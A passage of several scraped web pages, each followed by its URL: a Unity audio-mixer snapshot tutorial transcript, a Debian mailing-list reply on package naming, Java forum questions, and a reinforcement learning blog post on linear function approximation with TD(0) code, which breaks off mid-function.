- 08:32 - 08:35 On our audio mixer control game object we have - 08:35 - 08:37 our reverb control script. - 08:38 - 08:40 In our reverb control script we have - 08:40 - 08:43 the namespace declaration using UnityEngine.Audio. - 08:43 - 08:46 This allows us to access members - 08:46 - 08:49 of UnityEngine.Audio like the audio mixer, - 08:50 - 08:53 and audio mixer snapshot classes. - 08:53 - 08:57 We've declared a public variable of the audio mixer type - 08:57 - 09:00 called Mixer and also an array - 09:00 - 09:03 of audio mixer snapshots - 09:03 - 09:05 called Snapshots. - 09:05 - 09:09 We've also declared a public array of floats - 09:09 - 09:12 called Weights and we're going to use these - 09:12 - 09:15 to specify the weightings of each of the snapshots - 09:15 - 09:20 as we blend between our different snapshot states. - 09:20 - 09:23 We have a public function called BlendSnapshot, - 09:23 - 09:28 which takes a parameter of the type int called TriggerNr. - 09:28 - 09:30 This is the int that we're getting from our - 09:30 - 09:33 reverb trigger script when the player collides with the collier. - 09:33 - 09:35 We have a switch statement here which takes - 09:35 - 09:37 trigger number and chooses which of the - 09:37 - 09:39 colliders we've collided with, - 09:39 - 09:42 case 1, case 2 and case 3. - 09:42 - 09:44 In each of these cases we're going to set - 09:44 - 09:46 the weights of the weight array to correspond - 09:46 - 09:48 to the percentage of which - 09:48 - 09:51 snapshot we want to contribute to the blend. - 09:51 - 09:54 In case 1 which will be selected if they player triggers - 09:54 - 09:58 the right-most red trigger collider. - 09:58 - 10:01 We'll set the weights of our weights array - 10:01 - 10:03 to 1.0 and 0. 
- 10:03 - 10:07 What this will mean is that our resulting snapshot - 10:07 - 10:09 blend which will be created - 10:09 - 10:12 when we call mixer.transitionToSnapshot - 10:12 - 10:16 is a blend which is 100% of the snapshot - 10:16 - 10:18 at 0 in the snapshots array - 10:18 - 10:23 and 0% of the snapshot at 1 in the snapshots array. - 10:23 - 10:26 In case 3 we're doing the opposite thing, in this - 10:26 - 10:29 case we're going to have 0% of our no reverb - 10:29 - 10:32 snapshot and 100% of our heavy reverb snapshot. - 10:32 - 10:34 But case 2 is where things - 10:34 - 10:37 get interesting and where transition to snapshots - 10:37 - 10:39 becomes really useful. - 10:39 - 10:42 Here we're creating a third reverb state - 10:42 - 10:44 by transitioning to this blend - 10:44 - 10:49 of 25% of our no reverb snapshot - 10:49 - 10:53 and 75% of our heavy reverb snapshot. - 10:53 - 10:56 So we've created a third reverb state - 10:56 - 10:59 by transitioning to a blend of our - 10:59 - 11:01 two existing snapshots. - 11:01 - 11:04 In Unity we've assigned the variables - 11:04 - 11:06 of our reverb control script - 11:06 - 11:09 by dragging in our sound effects mixer asset - 11:09 - 11:12 to our mixer variable slot. - 11:12 - 11:15 We've also assigned the snapshots - 11:15 - 11:17 by clicking and selecting them from the list. - 11:17 - 11:20 Here we have our no reverb snapshot, - 11:20 - 11:23 and here we have our heavy reverbs snapshot. - 11:23 - 11:26 We've also set the size of our weights - 11:26 - 11:28 array to 2 so that it will - 11:28 - 11:30 match up to the size of - 11:30 - 11:32 our snapshots array and so that these - 11:32 - 11:34 lists of elements can line up. - 11:34 - 11:36 We haven't initialised the values here because - 11:36 - 11:39 those are going to be set by the script at run time. 
- 11:39 - 11:42 As we give this a try pay attention to the reverb - 11:42 - 11:46 return level on our gun shots track - 11:46 - 11:48 and watch how it changes as our - 11:48 - 11:50 character moves through each of the different - 11:50 - 11:52 triggers, let's give it a try. - 12:10 - 12:12 So what we've done here is we've used - 12:12 - 12:15 our two snapshots no reverb and heavy reverb - 12:15 - 12:18 to create this third blended snapshot - 12:18 - 12:20 represented by the purple collider. - 12:20 - 12:23 And, so we've chosen to show reverb here - 12:23 - 12:25 but this technique is applicable to all - 12:25 - 12:29 sorts of audio states and really any type of - 12:29 - 12:31 mixer state that you can save - 12:31 - 12:34 in a snapshot can be blended - 12:34 - 12:36 and recalled using this same technique. Related tutorials - Audio Mixer and Audio Mixer Groups (Lesson) - Audio Effects (Lesson) - Send and Receive Audio Effects (Lesson) - Duck Volume Audio Effect (Lesson) - Exposed AudioMixer Parameters (Lesson) Related documentation - Pre-Order Unity 5 Blog post (Blog)
https://unity3d.com/es/learn/tutorials/topics/audio/audio-mixer-snapshots?playlist=17096
Evan Prodromou wrote: > > But hey, I don't expect much compliance given that you've > > ignored the pleas for less namespace pollution back in 2002 > > when you were asked to do so in bug #150181. :P > > So, maybe it'd help if you explained what you mean by "pollution" > the Debian package namespace. The Debian package namespace is like parking lots: in general it's first come, first served. But as with parking lots, it's not first come, first served *only*. As there are some potential parking lots that are just too public to be actually used as parking lots (like right in front of the city hall entry), there are some package names that are just too generic to belong to any specific package (like "terminal"). For a more correct and more technical explanation of the concept of "namespace pollution", see any serious book on software design. It's just of no *real* use to anyone (not even to users of your package) to give a non-general package a general name. It just confuses (and annoys) a lot of people. Yes, there are some historical exceptions (e.g. "diff"), but these are widely tolerated because there hadn't been any serious alternatives for a long time.
https://lists.debian.org/debian-devel/2004/04/msg00325.html
Search results — Type: Posts; User: kalaicse30@gmail.com

Hi, can you tell me why I am getting this error: "[2013-12-05 11:06:26 - Emulator] Failed to create Context 0x3005"? What is the use of Oracle's VirtualBox, and how will it help to solve this...

Hi, I am entirely new to Android development and I am trying to do a small task in Android (a registration form), but I am getting an error like this. Please, can anyone help me solve this problem...

I did not get a proper answer from my research; that is why I posted in the forum. --- Update --- Are the available types depending upon the technology in use, like Struts or Spring...

Hi friends, how many MVC types are there and what are the differences between them? I got this question in an interview. Kindly help me clear my doubt... Regards,

Thank you to all who responded; I got the correct output.

import java.util.*;
public class Stringmaxrepeate {
    public static void main(String args[]) {
        Scanner in = new Scanner(System.in);
        String[] s = new String[10];
        int count = 1;
        Map...

I got the output, thank you.

Hi friends, I am trying to count continuous repeated occurrences of a string in a string array, e.g. input: now now how cow how; output: now ----> 2, but I don't know what is wrong...

Hi friends, my application UI is developed using JSP and Servlets. My question is: how do I set the screen resolution in JSP so that it is comfortable for all systems? Regards, Kalaiyarasi

Thank you for your reply. My question is: I will create an object of DerivedClass. BaseClass1 and BaseClass2 both have a function with the same name and the same parameter list, like Display(). If I try to call...

Hi friends, I know Java does not support multiple inheritance because of the diamond problem, but my question is how it can be achieved in C++, because C++ supports multiple...

Hi, my application supports the Airtel service with the Airtel APN, but my application should support all SIM services (it should be universal). Please, does anybody know the common APN for all SIM...

Hi, my application supports the Airtel service with the Airtel APN, but my application should support all SIM services. Does anybody know the common APN for all SIM services, and how I can make...

Thank you.

Hi friends, I want to do the SCJP certification. Please, can anybody tell me what the difference is between SCJP 5 and 6, which has more scope, and how to apply for the exam? Regards, Kalaiyarasi.D

It is not a classpath problem; it is part of the task. Without including the code above, the jar file is created successfully. If I include it, it gives the compilation error "cannot find symbol [javac]"...

Hi, here I am giving my sample code:

import com.nxp.atop.baseband.Baseband;
import com.nxp.telematics.otp.*;

public class sms {
    Otp otp = OtpFactory.getOtp();
    System.out.println(" get...

Hi friends, I'm developing a device application in Java. I want to know how to get the IMEI in Java. Please help. Regards, Kalaiyarasi

Hi friends, I have 1 year of experience in Java development (core Java, Servlets and JSP). Now I am planning to switch from my current company, but I don't know what the things are that I need to...

Hi, I'm trying to pass an array list from a servlet to a JSP page, but it always shows null values. I do not know whether the problem is in the database connectivity or in passing the array list.

Hi, I am trying to pass an ArrayList from a Servlet to a JSP page, where the data is fetched from a MySQL database. Please, can anyone tell me what is wrong in my code?

Login.java
package com;
http://www.javaprogrammingforums.com/search.php?s=02777deae04ac56e54f8aa21890931c4&searchid=1075588
Dissecting Reinforcement Learning - Part 7

So far we have represented the utility function by a lookup table (or a matrix, if you prefer). This approach has a problem: when the underlying Markov decision process is large, there are too many states and actions to store in memory. Moreover, in this case it is extremely difficult to visit all the possible states, meaning that we cannot estimate the utility values for those states. The key issue is generalization: how to produce a good approximation of a large state space while experiencing only a small subset of it. In this post I will show you how to use a linear combination of features in order to approximate the utility function. This new technique will allow us to master new and old problems more efficiently. For example, in this post you will learn how to implement a linear version of the TD(0) algorithm and how to use it to find the utilities of multiple gridworlds. The reference for this post is chapter 8 of Sutton and Barto's book, called "Generalization and Function Approximation". Another good resource is video-lesson 6 of David Silver's course. A wider introduction to function approximation is given by any good machine learning textbook; I suggest Pattern Recognition and Machine Learning by Christopher Bishop. I want to start this post with a brief excursion into the neuroscience world. Let's see how a function approximator relates to biological brains.

Approximators (and grandmothers)

You couldn't read this post without using a powerful approximator: your brain. The first primordial brains, a bunch of nerve cells, gave a great advantage, allowing elementary creatures to better perceive and react, considerably extending their lifespan. Evolution shaped brains for thousands of years, optimising size, modularity, and connectivity. Having a brain seems a big deal. Why? What's the purpose of having a brain?
We can consider the world as a huge and chaotic state space, where the correct evaluation of a specific stimulus makes the difference between life and death. The brain stores information about the environment and allows an effective interaction with it. Let's suppose that our brain is a massive lookup table, which stores a single state in a single neuron (or cell). This is known as a local representation, and the theory is often called the grandmother cell theory. A grandmother cell is a hypothetical neuron that responds only to a specific and meaningful stimulus, such as the image of one's grandmother. The term is due to the cognitive scientist Jerry Lettvin, who used it to illustrate the inconsistency of the concept during a lecture at MIT. To describe the grandmother cell theory I will use the following example. Let's suppose we bring a subject into an isolated room. The activity of a group of neurons in the subject's brain is constantly monitored. In front of the subject there is a screen. Showing the subject a picture of his grandmother, we notice that a specific neuron fires. Showing the grandmother in different contexts (e.g. in a group picture) activates the neuron again. However, showing a neutral stimulus on screen does not activate the neuron. During the 1970s the grandmother cell moved into neuroscience journals and a proper scientific discussion started. In the same period Gross et al. (1972) observed neurons in the inferior temporal cortex of the monkey that fired selectively to hands and faces. The grandmother cell theory started to be seriously taken into account. The theory was appealing because it was simple to grasp and pretty intuitive. However, a theoretical analysis of the grandmother cell revealed many underlying weaknesses. For instance, in this framework the loss of a cell means the loss of a specific chunk of information. Basic neurobiological observations strongly suggest the opposite.
It is possible to hypothesise multiple grandmother cells which codify the same information in a distributed way: redundancy prevents loss. This explanation complicates the situation even more, because storing a single state now requires multiple entries in the lookup table; to store $N$ states without the risk of information loss, many more than $N$ cells are required. The paradox of the grandmother cell is that, in trying to simplify the brain's functioning, it ends up complicating it. Is there an alternative to the grandmother cell hypothesis? We can suppose that information is stored in a distributed way, and that each single concept is represented through a pattern of activity. This theory was strongly sustained by researchers such as Geoffrey Hinton (one of the "godfathers" of deep learning) and James McClelland. The distributed representation theory gives a big advantage: having $N$ cells it is possible to represent many more than $N$ states, whereas this is not true for a local representation. Moreover, a distributed representation is robust against loss and guarantees an implicit redundancy. Even though each active unit is less specific in its meaning, the combination of active units is far more specific. To understand the difference between the two representations, think about a computer keyboard. In the local representation each single key can codify only a single character. In the distributed representation we can use a combination of keys (e.g. Shift and Ctrl) to associate multiple characters to the same key. The image below (inspired by Hinton, 1984) shows how two stimuli (red and green dots) are codified in a local and a distributed scheme. The local scheme is represented as a two-dimensional grid, where it is always necessary to have two active units to codify a stimulus. We can think of the distributed representation as an overlapping between radial units. The two stimuli are codified through a high-level pattern given by the units enclosed in a specific activation radius.
How is it possible to explain the monkey selective neurons described by Gross et al. (1972) using a distributed representation? A selective neuron can be the visible part of an underlying network which encapsulates the information. Further research showed that those selective neurons had a large variation in their responsiveness, and that this variation was connected to different aspects of faces. This observation suggested that those neurons embedded a distributed representation of faces. If you think that the grandmother cell theory is something born and dead in the Seventies, you are wrong. In recent years the local representation theory received support from biological observations (see Bowers 2009); however, these results have been strongly criticised by Plaut and McClelland (2009). For a very recent survey I suggest this article. From a machine learning perspective we know that the distributed representation works. The success of deep learning is based on neural networks, which are powerful function approximators. Moreover, different methods, such as dropout, are tightly related to the distributed representation theory. Now it's time to go back to reinforcement learning and see how a distributed representation can solve the problems caused by a local representation.

Function approximation intuition

Here I will use again the robot cleaning example described in previous posts. The robot moves in a two-dimensional world we called gridworld. It has only 4 possible actions available (forward, backward, left, right) and its goal is to reach the charger (green cell) while avoiding the stairs (red cell). I define $U(s)$ as our usual utility function and $Q(s,a)$ as the state-action function. The gridworld is a discrete rectangular state space having $c$ columns and $r$ rows. Using a tabular approach we can represent $U(s)$ using a table containing $N = c \times r$ elements, where $N$ represents the total number of states. To represent $Q(s,a)$ we need a table of size $N \times M$, where $M$ is the total number of actions.
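To make these sizes concrete, here is a quick count for the 5x5 gridworld with 4 actions used in this series (the 3-parameter figure anticipates the two weights plus a bias of the linear approximator described later):

```python
# Tabular memory cost for a c x r gridworld with M actions, compared with
# the 3 parameters (two weights plus a bias) of the linear approximator.
c, r, M = 5, 5, 4
N = c * r                  # total number of states
u_table_size = N           # one utility value per state
q_table_size = N * M       # one value per state-action pair
approximator_size = 3      # two feature weights plus a bias weight

print(u_table_size, q_table_size, approximator_size)  # 25 100 3
```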
In the previous posts I always represented the lookup tables using matrices. As utility function I used a matrix having the same size as the world, whereas for the state-action function I used a matrix having $N$ columns (states) and $M$ rows (actions). In the first case, to get the utility we have to access the location of the matrix corresponding to the particular state where we are. In the second case, we use the state as index to access the column in the state-action matrix, and from that column we return the utilities of all the available actions. How can we fit the function approximation mechanism inside this scheme? Let's start with some definitions. Defining $S$ as the set of possible states and $A$ as the set of possible actions, we define a utility function approximator $\hat{U}(s, \mathbf{w})$ having parameters stored in a vector $\mathbf{w}$. Here I use the hat on top of $\hat{U}$ to differentiate this function from the tabular version $U(s)$. Before explaining how to create a function approximator, it is helpful to visualise it as a black box. The method described below can be used on different approximators, and for this reason we can easily apply it to the box content. The black box takes as input the current state and returns the utility of the state or the state-action utilities. That's it. The main advantage is that we can approximate (with an arbitrarily small error) the utilities using fewer parameters than the tabular approach: the number of elements stored in the vector $\mathbf{w}$ is smaller than the number of values in the tabular counterpart. I guess there is a question that came to your head: what is inside the black box? This is a legitimate question, and now I will try to give you the intuition. In the case of a black box that is approximating a utility function, the content of the box is $\hat{U}(s, \mathbf{w})$. You can imagine the utility function as a music mixer and the vector of weights as the mixer sliders. We want to adjust the sliders in order to obtain a sound which is similar to a predefined tone.
How to do it? Well, we can move one of the sliders and compare the output with the reference tone. If the output is more similar to the reference, we know that we moved the right slider. Repeating this process many times, we eventually obtain a tone which is very similar to the reference sound. Using a more formal view, we can say that the vector $\mathbf{w}$ is adjusted at every iteration, moving its values by a quantity $\Delta\mathbf{w}$, in order to reach an objective, which is minimising a cost function. The cost is given by an error measure that we can obtain by comparing the output of the function with a target. For instance, we know from previous posts that the actual utility value of state (4,1) in our gridworld is 0.388. Let's say that at time $t$ the output of the box is 0.352. After the update step the output will be 0.371: we moved closer to the target value. Function approximation is an instance of supervised learning, and in principle all the supervised learning techniques could be used in function approximation. The vector $\mathbf{w}$ may be the set of connection weights of a neural network or the split points and leaf values of a decision tree. However, here I will consider only differentiable function approximators, such as linear combinations of features and neural networks, which represent the most promising techniques nowadays. In this post I will focus on linear combinations of features. Before describing the simplest case, the linear approximator, I would like to introduce the general methodology used to adjust the vector of weights. The goal in function approximation is to move $\hat{U}(s, \mathbf{w})$ as close as possible to the real utility function by adjusting the internal parameters stored in $\mathbf{w}$. To achieve this goal we need two things: first, an error measure that can give us feedback on how close we are to the target; second, an update rule for adjusting the weights. In the next section I will describe these two components.
Method

To improve the performance of our function approximator we need an error measure and an update rule. These two components work tightly together in the learning cycle of every supervised learning technique, and their use in reinforcement learning is not much different from how they are used in a classification task. In order to understand this section you need to refresh some concepts of multivariable calculus, such as the partial derivative and the gradient.

Error measure: a common error measure is given by the Mean Squared Error (MSE) between two quantities. For instance, if we have the optimal utility function $U^{*}(s)$ and an approximator function $\hat{U}(s, \mathbf{w})$, then the MSE is defined as follows:

$$\text{MSE}(\mathbf{w}) = \mathbb{E}\Big[ \big( U^{*}(s) - \hat{U}(s, \mathbf{w}) \big)^{2} \Big]$$

That's it: the MSE is given by the expectation that quantifies the difference between the target and the approximator output. When the training is working correctly, the MSE will decrease, meaning that we are getting closer to the optimal utility function. The MSE is a common loss function in supervised learning. However, in reinforcement learning a reinterpretation of the MSE called the Mean Squared Value Error (MSVE) is often used. The MSVE introduces a distribution $\mu(s)$ that specifies how much we care about each state $s$. As I told you, the function approximator is based on a set of weights $\mathbf{w}$ that contains fewer elements than the total number of states. For this reason, adjusting a subset of the weights means improving the utility prediction of some states while losing precision in others. We have limited resources and we have to manage them carefully. The function $\mu(s)$ gives us an explicit solution, and using it we can rewrite the previous equation as follows:

$$\text{MSVE}(\mathbf{w}) = \sum_{s \in S} \mu(s) \Big[ U^{*}(s) - \hat{U}(s, \mathbf{w}) \Big]^{2}$$

Update rule: the update rule for a differentiable approximator is gradient descent. The gradient is a generalisation of the concept of derivative applied to scalar-valued functions of multiple variables. You can imagine the gradient as the vector that points in the direction of the greatest rate of increase.
Intuitively, if you want to reach the top of a mountain, the gradient is a signpost that, at each moment, shows you in which direction you should walk. The gradient is generally represented with the operator $\nabla$, also known as nabla. The goal in gradient descent is to minimise the error measure. We can achieve this goal by moving in the direction of the negative gradient vector, meaning that we are no longer moving to the top of the mountain but downslope. At each step we adjust the parameter vector, moving a step closer to the valley. First of all, we have to estimate the gradient vector of $\text{MSE}(\mathbf{w})$ or $\text{MSVE}(\mathbf{w})$. Those error functions are based on $\hat{U}(s, \mathbf{w})$. In order to get the gradient vector we have to calculate the partial derivative of the error with respect to each weight. Secondly, once we have the gradient vector, we have to adjust the value of all the weights in accordance with the negative direction of the gradient. In mathematical terms, we can update the vector $\mathbf{w}$ at $t+1$ as follows:

$$\mathbf{w}_{t+1} = \mathbf{w}_{t} - \frac{1}{2} \alpha \nabla_{\mathbf{w}} \Big[ U^{*}(s_{t}) - \hat{U}(s_{t}, \mathbf{w}_{t}) \Big]^{2} = \mathbf{w}_{t} + \alpha \Big[ U^{*}(s_{t}) - \hat{U}(s_{t}, \mathbf{w}_{t}) \Big] \nabla_{\mathbf{w}} \hat{U}(s_{t}, \mathbf{w}_{t})$$

The last step is an application of the chain rule, which is necessary because we are dealing with a function composition. We want to find the gradient vector of the error function with respect to the weights, and the weights are part of our function approximator $\hat{U}(s, \mathbf{w})$. The minus sign in front of the quantity 1/2 is used to change the direction of the gradient vector: remember that the gradient points to the top of the hill, while we want to go to the bottom (minimising the error). In conclusion, the update rule tells us that all we need is the output of the approximator and its gradient. Finding the gradient of a linear approximator is particularly easy, whereas in non-linear approximators (e.g. neural networks) it requires more steps. At this point you might think we have all we need to start the learning procedure; however, an important piece is missing. We supposed it was possible to use the optimal utility function $U^{*}(s)$ as target in the error estimation step. We do not have the optimal utility function.
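Before addressing that problem, the update rule itself can be sketched numerically. In this minimal sketch all the numbers are made up, and a fixed stand-in value plays the role of the (unknown) optimal utility; the point is only that one gradient step reduces the squared error:

```python
import numpy as np

# One gradient descent step for a linear approximator U_hat(s, w) = x . w,
# using a made-up constant target in place of U*(s).
x = np.array([1.0, 2.0])      # feature vector of the current state
w = np.array([0.1, 0.1])      # current weights
target = 0.9                  # stand-in for the (unknown) optimal utility
alpha = 0.1                   # step size

error_before = (target - np.dot(x, w)) ** 2
# w_t1 = w + alpha * [target - U_hat] * grad(U_hat), where grad(U_hat) = x
w = w + alpha * (target - np.dot(x, w)) * x
error_after = (target - np.dot(x, w)) ** 2

print(error_after < error_before)  # True: the step reduced the error
```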
Think about that: having this function would mean we do not need an approximator at all. Moving in our gridworld, we could simply call $U^{*}(s)$ at each time step and get the actual utility value of that state. What we can do to overcome this problem is to build a target function $\tilde{U}(s)$ which represents an approximated target and plug it into our formula:

$$\mathbf{w}_{t+1} = \mathbf{w}_{t} + \alpha \Big[ \tilde{U}(s_{t}) - \hat{U}(s_{t}, \mathbf{w}_{t}) \Big] \nabla_{\mathbf{w}} \hat{U}(s_{t}, \mathbf{w}_{t})$$

How can we estimate the approximated target? We can follow different approaches, for instance using Monte Carlo or TD learning. In the next section I will introduce these methods.

Target estimation

In the previous section we came to the conclusion that we need approximated target functions for $U$ and $Q$ to use in the error evaluation and update rule. The type of target used is at the heart of function approximation in reinforcement learning. There are two main approaches.

Monte Carlo target: an approximated value for the target can be obtained through a direct interaction with the environment. Using a Monte Carlo approach (see the second post) we can generate an episode and update the function based on the states encountered along the way. The target is the return $G_{t}$, and the estimation of the optimal function is unbiased because $\mathbb{E}[G_{t}] = U^{*}(s_{t})$, meaning that the prediction is guaranteed to converge.

Bootstrapping target: the other approach used to build the target is called bootstrapping, and I introduced it in the third post. In bootstrapping methods we do not have to complete an episode to get an estimation of the target; we can directly update the approximator parameters after each visit. The simplest form of bootstrapping target is the one based on TD(0), which is defined as follows:

$$\tilde{U}(s_{t}) = r_{t+1} + \gamma \hat{U}(s_{t+1}, \mathbf{w})$$

That's it: the target is obtained through the approximation given by the estimator itself at $s_{t+1}$. I already wrote about the differences between the two approaches; however, here I would like to discuss them again in the new context of function approximation. In both cases the functions $\hat{U}$ and $\hat{Q}$ are based on the vector of weights $\mathbf{w}$. For this reason, the correct notation we are going to use from now on is $\hat{U}(s, \mathbf{w})$ and $\hat{Q}(s, a, \mathbf{w})$.
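The two targets can be computed side by side in a few lines. The episode rewards and the bootstrapped estimate below are made-up numbers, chosen only to show the mechanics:

```python
import numpy as np

gamma = 0.9
# Hypothetical episode: rewards observed after each step (made-up values).
rewards = [0.0, 0.0, 1.0]

# Monte Carlo target for the first state: the full discounted return G_t.
mc_target = sum((gamma ** i) * r for i, r in enumerate(rewards))

# TD(0) target: one reward plus the bootstrapped estimate of the next state.
u_hat_next = 0.5                          # current (imperfect) estimate of U(s_{t+1})
td_target = rewards[0] + gamma * u_hat_next

print(round(mc_target, 2), round(td_target, 2))  # 0.81 0.45
```

Note how the Monte Carlo target needs the whole episode, while the TD(0) target is available after a single step.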
We have to be particularly careful when using bootstrapping methods in gradient-based approximators. Bootstrapping methods are not true instances of gradient descent because they take into account the effect of changing the parameters $\mathbf{w}$ only in the estimate, not in the target. At training time we adjust $\mathbf{w}$ in the estimator based on a measure of error, but we are not changing the parameters of the target function based on an error measure. Bootstrapping ignores the effect on the target, taking into account only the gradient of the estimation. For this reason, bootstrapping techniques are called semi-gradient methods. Due to this issue, semi-gradient methods do not guarantee convergence. At this point you may think that it is better to use Monte Carlo methods, because at least they are guaranteed to converge. However, bootstrapping gives two main advantages. First of all, bootstrapping methods learn online, and it is not required to complete the episode in order to update the weights. Secondly, they are faster to learn and computationally friendly. The Generalised Policy Iteration (GPI) (see the second post) applies here as well. Let's suppose we start with a random set of weights. At the very first step the agent follows an epsilon-greedy strategy, moving to the state with the highest utility. After the first step it is possible to update the weights using gradient descent. What's the effect of this adjustment? The effect is to slightly improve the utility function. At the next step the agent again follows a greedy strategy, then the weights are updated through gradient descent, and so on and so forth. As you can see, we are applying the GPI scheme again.

Linear approximator

It's time to put everything together! We have built a method based on an error measure and an update rule, and we know how to estimate a target. Now I will show you how to build an approximator, the content of the black box, represented by the function $\hat{U}(s, \mathbf{w})$.
I will describe the linear approximator, which is the simplest case of linear combination, whereas in the next section I will describe some higher-order approximators. Before describing the linear approximator I want to clarify a crucial point, in order to avoid a common misunderstanding. The linear approximator is a particular case of the broader class of linear combinations of features. A linear combination is based on a polynomial which may or may not be a line. Using only a line to discriminate between states can be very limiting. Linear combination means that the parameters are linearly combined; we are not saying anything about the input features, which in fact may be represented by a high-order polynomial. Hopefully this distinction will be clear at the end of the post. In the linear approximator we model the state as a vector of features $\mathbf{x}$. This vector contains the current state values at time $t$; these values are called features. There are different notations for the feature vector, but the most common are $\mathbf{x}$ and $\boldsymbol{\phi}$; I will use both. The features can be the position of a robot, the angular position and speed of an inverted pendulum, the configuration of the stones in a Go game, etc. Here I also define $\mathbf{w}$ as the vector of weights (or parameters) of our linear approximator, having the same number of elements as $\mathbf{x}$. Now we have two vectors and we want to use them in a linear function. How to do it? Simple: we have to perform the dot product between $\mathbf{x}$ and $\mathbf{w}$ as follows:

$$\hat{U}(s, \mathbf{w}) = \mathbf{x}^{\top} \mathbf{w}$$

If you are not used to linear algebra notation, don't get scared. This is equivalent to the following sum:

$$\hat{U}(s, \mathbf{w}) = \sum_{i=1}^{N} x_{i} w_{i}$$

where $N$ is the total number of features. Geometrically this solution is represented by a line (in a two-dimensional space), a plane (in a three-dimensional space), or a hyper-plane (in hyper-spaces). Now we know the content of the black box, which is given by the dot product of the vectors $\mathbf{x}$ and $\mathbf{w}$. However, in order to apply the method described in the previous section we still need the error measure, the update rule, and the target.
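The dot product translates directly into Numpy. In this sketch the feature values (a gridworld position) and the weights are made-up numbers:

```python
import numpy as np

# Feature vector of a state, e.g. the (column, row) position in the gridworld.
x = np.array([4.0, 1.0])
# Weight vector of the linear approximator (made-up values).
w = np.array([0.1, -0.2])

# U_hat(s, w) = x . w = sum_i x_i * w_i
utility = np.dot(x, w)
print(round(utility, 2))  # 4*0.1 + 1*(-0.2) = 0.2
```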
Using the MSE we can write the error measure as follows:

$$\text{MSE}(\mathbf{w}) = \mathbb{E}\Big[ \big( U^{*}(s) - \mathbf{x}^{\top} \mathbf{w} \big)^{2} \Big]$$

Using the TD(0) definition we can define the target as follows:

$$\tilde{U}(s_{t}) = r_{t+1} + \gamma\, \mathbf{x}_{t+1}^{\top} \mathbf{w}$$

The update rule defined previously can be reused here as well; however, we have to introduce the reward and the discount factor gamma, as required by the reinforcement learning definition:

$$\mathbf{w}_{t+1} = \mathbf{w}_{t} + \alpha \Big[ r_{t+1} + \gamma\, \hat{U}(s_{t+1}, \mathbf{w}_{t}) - \hat{U}(s_{t}, \mathbf{w}_{t}) \Big] \nabla_{\mathbf{w}} \hat{U}(s_{t}, \mathbf{w}_{t})$$

Great, we have almost all we need. I said almost because a last piece is missing. The update rule requires the gradient $\nabla_{\mathbf{w}} \hat{U}(s, \mathbf{w})$. How to find it? It turns out that the gradient of the linear approximator simplifies to a very nice form. First of all, based on the previous definitions, we can rewrite the gradient as follows:

$$\nabla_{\mathbf{w}} \hat{U}(s, \mathbf{w}) = \nabla_{\mathbf{w}} \big( \mathbf{x}^{\top} \mathbf{w} \big) = \nabla_{\mathbf{w}} \big( x_{1} w_{1} + x_{2} w_{2} + \dots + x_{N} w_{N} \big)$$

Now we have to find the partial derivatives of the function approximator with respect to each single weight. For each unknown we have to find the derivative, considering the other unknowns as constants. For instance, the partial derivative with respect to the first unknown is simply $x_{1}$, because all the other values are considered constants and the derivative of a constant is zero:

$$\frac{\partial}{\partial w_{1}} \big( x_{1} w_{1} + x_{2} w_{2} + \dots + x_{N} w_{N} \big) = x_{1}$$

Applying the same process to all the other weights, we end up with the following gradient vector:

$$\nabla_{\mathbf{w}} \hat{U}(s, \mathbf{w}) = \mathbf{x}$$

That's it: the gradient is simply the input vector $\mathbf{x}$. Now we can rewrite the update rule as follows:

$$\mathbf{w}_{t+1} = \mathbf{w}_{t} + \alpha \Big[ r_{t+1} + \gamma\, \mathbf{x}_{t+1}^{\top} \mathbf{w}_{t} - \mathbf{x}_{t}^{\top} \mathbf{w}_{t} \Big] \mathbf{x}_{t}$$

Great, this is the final form of the update rule for the linear approximator. We have all we need now. Let's get the party started!

Application: gridworld (and the bias)

Let's suppose we have a square gridworld where charging stations (green cells) and stairs (red cells) are disposed in multiple locations. The position of the positive and negative cells can vary, giving rise to four worlds which I called: OR-world, AND-world, NAND-world, XOR-world. The rules of the worlds are similar to the ones defined in the previous posts. The robot has four actions available: forward, backward, left, right. When an action is performed, with a probability of 0.2 it can lead to a wrong movement. The reward is positive (+1.0) for green cells, negative (-1.0) for red cells, and null in all the other cases.
The index convention for the states is the usual (column, row), where (0,0) represents the cell in the bottom-left corner and (4,4) the cell in the top-right corner. If you are familiar with Boolean algebra, you have already noticed that there is a pattern in the worlds which reflects basic Boolean operations. From the geometrical point of view, when we apply a linear approximator to the Boolean worlds, we are trying to find a plane in a three-dimensional space which can discriminate between states with high utility (green cells) and states with low utility (red cells). In the three-dimensional space the x-axis is represented by the columns of the world, whereas the y-axis is represented by the rows. The utility value is given by the z-axis. During gradient descent we are changing the weights, adjusting the inclination of the plane and the utilities associated to each state. To better understand this point you can plug the plane equation $z = w_{1} x + w_{2} y$ into Wolfram Alpha and give a look at the resulting plot. Changing the coefficients associated to $x$ and $y$ you are changing the weights associated to those features, and you are in fact moving the plane. Try again with different coefficients and observe how the plane rotates. The Python implementation is based on a random agent which freely moves in the world. Here we are only interested in estimating the state utilities; we do not want to find a policy.
The core of the code is the update rule defined in the previous section, summarised in a few lines thanks to Numpy:

def update(w, x, x_t1, reward, alpha, gamma, done):
    '''Return the updated weights vector w_t1

    @param w the weights vector before the update
    @param x the feature vector observed at t
    @param x_t1 the feature vector observed at t+1
    @param reward the reward observed after the action
    @param alpha the step size (learning rate)
    @param gamma the discount factor
    @param done boolean True if the state is terminal
    @return w_t1 the weights vector at t+1
    '''
    if done:
        w_t1 = w + alpha * ((reward - np.dot(x, w)) * x)
    else:
        w_t1 = w + alpha * ((reward + (gamma * np.dot(x_t1, w)) - np.dot(x, w)) * x)
    return w_t1

The function numpy.dot() is an implementation of the dot product. The conditional statement is used to discriminate between terminal (done=True) and non-terminal (done=False) states. In the case of a terminal state the target is obtained using only the reward. This is obvious, because after a terminal state there is no other state to use for approximating the target. You can check the complete code on the official GitHub repository of the series; the Python script is called boolean_worlds_linear_td.py. In my experiments I set the learning rate to a small initial value and linearly decreased it during the iterations. The weights were randomly initialised. Using matplotlib I drew the planes generated for the worlds in a three-dimensional plot. The surface of each plane is the utility value returned by the linear approximator. The utility should be -1 in proximity of a red cell and +1 in proximity of a green cell. However, examining the plot we can notice that something strange is happening. The planes are flat, and the resulting utility is always close to zero in all the worlds but the OR-world. It seems that the approximator is not working at all and that its output is always null. What is going on?
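As a quick sanity check of this update rule, here is a self-contained toy run (not part of the original script; the update function is restated so the snippet runs on its own). A single state with feature vector [1.0] always transitions to a terminal state with reward +1, so its estimated utility should converge to 1.0:

```python
import numpy as np

def update(w, x, x_t1, reward, alpha, gamma, done):
    """TD(0) update of the weights of a linear approximator."""
    if done:
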